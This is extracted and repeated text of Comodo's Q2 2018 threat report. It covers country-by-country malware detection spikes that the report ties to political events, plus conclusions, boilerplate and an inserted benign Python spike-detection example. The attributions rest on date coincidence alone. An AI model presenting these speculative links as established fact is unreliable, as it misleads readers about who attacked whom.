Asia: Comodo Security Solutions Pvt. Ltd., Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel: +91 44 4562 2800. www.comodo.co.in

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day.

The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository

About Comodo Cybersecurity

Brought to you by

  • 1 Executive summary
    • 11 Overview
    • 12 New Trends
      • 121 Trojans jumped to the top of the malware list
      • 122 Cryptominers evolved into multifunctional malware
      • 123 Android malware skyrocketed in variety
      • 124 Geopolitical intelligence
          • 2 Trojans going on the offensive to hunt for confidential data
            • 21 The Most Widespread Trojan
            • 22 PowerShell-based attack with Emotet
            • 23 Flawed Ammyy RAT attack based on legitimate software
            • 24 The growth of Flawed Ammyy attacks for Q2
            • 25 Ammyy Admin dissemination around the world for Q2
              • 3 Cryptominer Evolution
                • Going Fileless Killing Competitors Crashing Systems
                • 31 BadShell attacks enterprises
                • 32 WinstarNssmMiner a system killer
                • 33 CoinMiner kills rivals
                • 34 CoinHive changes its skin
                • 35 Cryptocurrency clipboard hijacker intercepts transfers
                  • 4 Android Devices Under Siege
                    • 41 Spying Stealing Mining
                      • 411 KevDroid
                      • 412 Zoo Park
                      • 413 MikeSpy
                      • 414 Xloader
                      • 415 Stalker Spy
                      • 416 Mystery Bot
                      • 417 FakeSpy
                      • 418 RedAlert
                      • 419 Hero Rat
                      • 4110 Sonvpay
                      • 4111 CoinHive
                        • 42 Android Malware Catalogued by Month
                          • 421 April 2018
                          • 422 May 2018
                          • 423 June 2018
                              • 5 Malware in Q2 2018 The Big Picture
                                • 51 Strategic Threat Computer Worms
                                  • 511 Generic Worms
                                  • 512 Net Worms
                                  • 513 Email Worms
                                  • 514 p2p Worms
                                  • 515 IM Worms
                                    • 52 High Threat Malware
                                      • 521 Backdoors
                                      • 522 Viruses
                                      • 523 Trojans
                                      • 524 Exploits
                                        • 53 Medium Threat Malware
                                          • 531 Constructor
                                          • 532 Packers
                                          • 533 Email Flooder
                                          • 534 Virtual Tools
                                          • 535 Jokes
                                            • 54 Low Threat Malware Applications
                                              • 541 Applications
                                              • 542 Unwanted Applications
                                              • 543 Unsafe Applications
                                                  • 6 Vertical analysis
                                                  • 7 Geopolitical Intelligence
                                                    • 71 USA
                                                    • 72 China
                                                    • 73 South Korea
                                                    • 74 North Korea
                                                    • 75 Armenia
                                                    • 76 Belarus
                                                    • 77 Iraq
                                                    • 78 Ukraine
                                                    • 79 Croatia
                                                    • 710 Finland Russia USA
                                                      • 8 Conclusions

Global Threat Report Q2 2018 Edition

Page 63 of 73

7 Geopolitical Intelligence

71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes

Global Threat Report Q2 2018 Edition

Page 64 of 73

72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests

Global Threat Report Q2 2018 Edition

Page 65 of 73

73 South Korea

National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports

Global Threat Report Q2 2018 Edition

Page 66 of 73

74 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs

Global Threat Report Q2 2018 Edition

Page 67 of 73

75 Armenia

All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018

Global Threat Report Q2 2018 Edition

Page 68 of 73

76 Belarus

A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society

Global Threat Report Q2 2018 Edition

Page 69 of 73

77 Iraq

Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls

Global Threat Report Q2 2018 Edition

Page 70 of 73

78 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26

Global Threat Report Q2 2018 Edition

Page 71 of 73

79 Croatia

Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo

Global Threat Report Q2 2018 Edition

Page 72 of 73

710 Finland Russia USA

Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place

Global Threat Report Q2 2018 Edition

Page 73 of 73

8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples

Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims

Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data

Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures

NORTH AMERICA―

EUROPE―

ASIA―

REQUEST A DEMO Try Comodo Cybersecurity by speaking with

a security consultant to begin the process to set up a demo or proof-of-concept project

Contact us directly at +1 888-266-6361

copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC

VISIT COMODOCOM

Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom

Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772

Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin

Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190

countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more

than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing

millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day

The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential

threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine

learning-powered analytics artificial intelligence and human experts and insights to secure and protect

Comodo Cybersecurity customers business and public-sector partners and the public community

Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository

About Comodo Cybersecurity

Brought to you by


7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. June 4 clearly stands out as the single most prominent day. The most likely reason for this massive spike is that many intelligence services, both foreign and domestic, were busy trying to protect and/or collect sensitive information relating to current events within China. Why June 4? It is the anniversary of the 1989 Tiananmen Square protests.


7.3 South Korea

National security events always attract the attention of professional hackers who seek to collect the kind of information that forms the basis of intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes coincided with the annual joint US-South Korean military exercises. This should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.


7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike of well over ten times the usual number of detections. One plausible explanation is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected files and identified them as Windows activation or "cracking" software and Chinese-made anti-censorship programs. Both are tools that a user installs deliberately, which supports reading this spike as a burst of outbound connectivity from inside the country rather than as an attack campaign directed against it.


7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social life to business, politics and national security affairs, are mostly performed online. This is especially true during times of national crisis, when both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.


7.6 Belarus

A common hacker refrain is that "information wants to be free." Evidence for this argument is provided by this timeline, which shows Comodo's virus and trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation aimed at controlling the spread of "fake news," Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.


7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out, and both might be associated with recent electoral events. In mid-April, Iraq was preparing for a national election, which included the question of how best to secure its electronic components. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detections, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, the highest spike, on May 24, may have had more than one cause. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in the capital, Kyiv, on May 26.


7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it has been clear that cyberattacks can be used to punish not only individuals and enterprises but entire nations. In that context, this massive spike in malware detections in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility."


7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital, Helsinki. Geolocation of this virus activity in Finland revealed that it took place almost exclusively in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place. One caveat applies to any finding at this granularity: IP geolocation places a detection at the registered location of the address block, typically the ISP's point of presence, and not necessarily at the physical location of the infected machine, so a city-level cluster should be read as suggestive rather than conclusive.


8 Conclusions

In Q2, Comodo Cybersecurity observed several new, significant trends that are likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The increase in trojan malware in the last quarter suggests that the spread of malware in general will soon be amplified. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with their real impact being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a surge in infections of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in its delivery methods, more sophisticated in its persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets hold a variety of valuable information but lack protection comparable to that of desktop systems, which presages new attacks and further mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and to store confidential information (such as messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. After a successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of trojans detected in Q2 were information stealers, we can see another dangerous tendency: cybercriminals' accelerating focus on hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, changing the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and postures.




NORTH AMERICA―

EUROPE―

ASIA―

REQUEST A DEMO Try Comodo Cybersecurity by speaking with

a security consultant to begin the process to set up a demo or proof-of-concept project

Contact us directly at +1 888-266-6361

copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC

VISIT COMODOCOM

Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom

Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772

Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin

Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190

countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more

than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing

millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day

The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential

threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine

learning-powered analytics artificial intelligence and human experts and insights to secure and protect

Comodo Cybersecurity customers business and public-sector partners and the public community

Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository

About Comodo Cybersecurity

Brought to you by

  • 1 Executive summary
    • 11 Overview
    • 12 New Trends
      • 121 Trojans jumped to the top of the malware list
      • 122 Cryptominers evolved into multifunctional malware
      • 123 Android malware skyrocketed in variety
      • 124 Geopolitical intelligence
          • 2 Trojans going on the offensive to hunt for confidential data
            • 21 The Most Widespread Trojan
            • 22 PowerShell-based attack with Emotet
            • 23 Flawed Ammyy RAT attack based on legitimate software
            • 24 The growth of Flawed Ammyy attacks for Q2
            • 25 Ammyy Admin dissemination around the world for Q2
              • 3 Cryptominer Evolution
                • Going Fileless Killing Competitors Crashing Systems
                • 31 BadShell attacks enterprises
                • 32 WinstarNssmMiner a system killer
                • 33 CoinMiner kills rivals
                • 34 CoinHive changes its skin
                • 35 Cryptocurrency clipboard hijacker intercepts transfers
                  • 4 Android Devices Under Siege
                    • 41 Spying Stealing Mining
                      • 411 KevDroid
                      • 412 Zoo Park
                      • 413 MikeSpy
                      • 414 Xloader
                      • 415 Stalker Spy

Global Threat Report Q2 2018 Edition

Page 66 of 73

7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual, or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.


7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics, or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.


7.6 Belarus

A common hacker refrain is that "information wants to be free." Evidence for this argument is provided by this timeline, which shows Comodo's virus and trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news," Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny, or manipulate sensitive information related to the new legislation and its impact on Belarusian society.


7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.


7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility."


7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.
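The per-country timelines in 7.4 through 7.10 share one analytic pattern: flag the days where detections jump far above the usual level, then look for a dated event on or just before that day as a candidate explanation (a hypothesis, not attribution, since a spike may have several reasons or none). As an added example that is not code from the report, the Python below applies that pattern to a constructed daily series, using the "over ten times the usual number" threshold from the North Korea passage and a one-day look-back as in the Croatia and Ukraine passages; the counts and event labels are constructed and hypothetical.

```python
"""Spike detection and event correlation over a daily detection timeline.

Added example (not code from the report): the counts and events below are
constructed, not Comodo telemetry.
"""
from datetime import date, timedelta
from statistics import median

# Constructed daily detection counts for one country, starting 2018-05-01.
# A >10x spike is planted on May 9 and a mild ~3x bump on May 13.
SAMPLE_COUNTS = {
    date(2018, 5, 1) + timedelta(days=i): c
    for i, c in enumerate([22, 25, 19, 24, 21, 27, 23,
                           26, 410, 31, 24, 20, 88, 25,
                           23, 22, 27, 24, 21, 26, 25])
}

# Constructed, hypothetical dated events (not news items cited by the report).
SAMPLE_EVENTS = {
    date(2018, 5, 8): ["hypothetical: new media law passed"],
    date(2018, 5, 9): ["hypothetical: summit venue announced"],
    date(2018, 5, 13): ["hypothetical: public holiday"],
}


def rolling_baseline(counts, day, window=7):
    """Median count over the `window` calendar days before `day` that have data.

    The median rather than the mean is used so that yesterday's spike does not
    inflate today's baseline and mask a second, smaller anomaly.
    Returns None when fewer than half the window has data.
    """
    previous = (day - timedelta(days=k) for k in range(1, window + 1))
    history = [counts[d] for d in previous if d in counts]
    if len(history) < window // 2 + 1:
        return None
    return median(history)


def find_spikes(counts, factor=10.0, window=7):
    """Return the days whose count is at least `factor` times the rolling baseline."""
    spikes = []
    for day in sorted(counts):
        base = rolling_baseline(counts, day, window)
        if base is None or base <= 0:
            continue
        ratio = counts[day] / base
        if ratio >= factor:
            spikes.append({"day": day, "count": counts[day],
                           "baseline": base, "ratio": round(ratio, 1)})
    return spikes


def correlate(spikes, events, max_lag_days=1):
    """Attach to each spike every event on the same day or up to `max_lag_days`
    before it. A spike can end up with several candidates or with none; either
    way the result is a lead for an analyst, not an attribution."""
    correlated = []
    for spike in spikes:
        candidates = []
        for lag in range(max_lag_days + 1):
            when = spike["day"] - timedelta(days=lag)
            for label in events.get(when, []):
                candidates.append({"date": when, "lag_days": lag, "event": label})
        correlated.append({**spike, "candidate_events": candidates})
    return correlated


if __name__ == "__main__":
    for hit in correlate(find_spikes(SAMPLE_COUNTS), SAMPLE_EVENTS):
        print(f"{hit['day']}: {hit['count']} detections, "
              f"{hit['ratio']}x the 7-day median of {hit['baseline']}")
        if not hit["candidate_events"]:
            print("    no dated event within the look-back window")
        for ev in hit["candidate_events"]:
            print(f"    candidate ({ev['lag_days']} day(s) before): {ev['event']}")
```

Lowering `factor` to 3.0 also surfaces the May 13 bump, which shows why the threshold, not just the chart, should be stated when a spike is reported.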


8 Conclusions

In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence, and much harder for antivirus software to detect. Propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information, or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies, and postures.

About Comodo Cybersecurity

Comodo Threat Research Labs monitors, filters, and analyzes malware, ransomware, viruses, and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia, and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists, and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam, or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government, and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates, and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network, and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine, and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.

REQUEST A DEMO: Try Comodo Cybersecurity by speaking with a security consultant to begin the process to set up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.

NORTH AMERICA: Comodo Security Solutions, Inc., 1255 Broad Street, Clifton, NJ 07013, United States. Tel: +1 (888) 551 1531; Tel: +1 (888) 266 6361; Int: +1 (703) 581 6361; Fax: +1 (973) 777 4394; sales@comodo.com

EUROPE: Comodo Security Solutions, Inc., Șoseaua Națională 31, Iași 700237, Romania. Tel: +40 332 806 772

ASIA: Comodo Security Solutions Pvt. Ltd., Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel: +91 44 4562 2800; www.comodo.co.in

© 2018 All Rights Reserved. Comodo Security Solutions, Inc. Visit comodo.com.

  • 1 Executive summary
    • 11 Overview
    • 12 New Trends
      • 121 Trojans jumped to the top of the malware list
      • 122 Cryptominers evolved into multifunctional malware
      • 123 Android malware skyrocketed in variety
      • 124 Geopolitical intelligence
          • 2 Trojans going on the offensive to hunt for confidential data
            • 21 The Most Widespread Trojan
            • 22 PowerShell-based attack with Emotet
            • 23 Flawed Ammyy RAT attack based on legitimate software
            • 24 The growth of Flawed Ammyy attacks for Q2
            • 25 Ammyy Admin dissemination around the world for Q2
              • 3 Cryptominer Evolution
                • Going Fileless Killing Competitors Crashing Systems
                • 31 BadShell attacks enterprises
                • 32 WinstarNssmMiner a system killer
                • 33 CoinMiner kills rivals
                • 34 CoinHive changes its skin
                • 35 Cryptocurrency clipboard hijacker intercepts transfers
                  • 4 Android Devices Under Siege
                    • 41 Spying Stealing Mining
                      • 411 KevDroid
                      • 412 Zoo Park
                      • 413 MikeSpy
                      • 414 Xloader
                      • 415 Stalker Spy
                      • 416 Mystery Bot
                      • 417 FakeSpy
                      • 418 RedAlert
                      • 419 Hero Rat
                      • 4110 Sonvpay
                      • 4111 CoinHive
                        • 42 Android Malware Catalogued by Month
                          • 421 April 2018
                          • 422 May 2018
                          • 423 June 2018
                              • 5 Malware in Q2 2018 The Big Picture
                                • 51 Strategic Threat Computer Worms
                                  • 511 Generic Worms
                                  • 512 Net Worms
                                  • 513 Email Worms
                                  • 514 p2p Worms
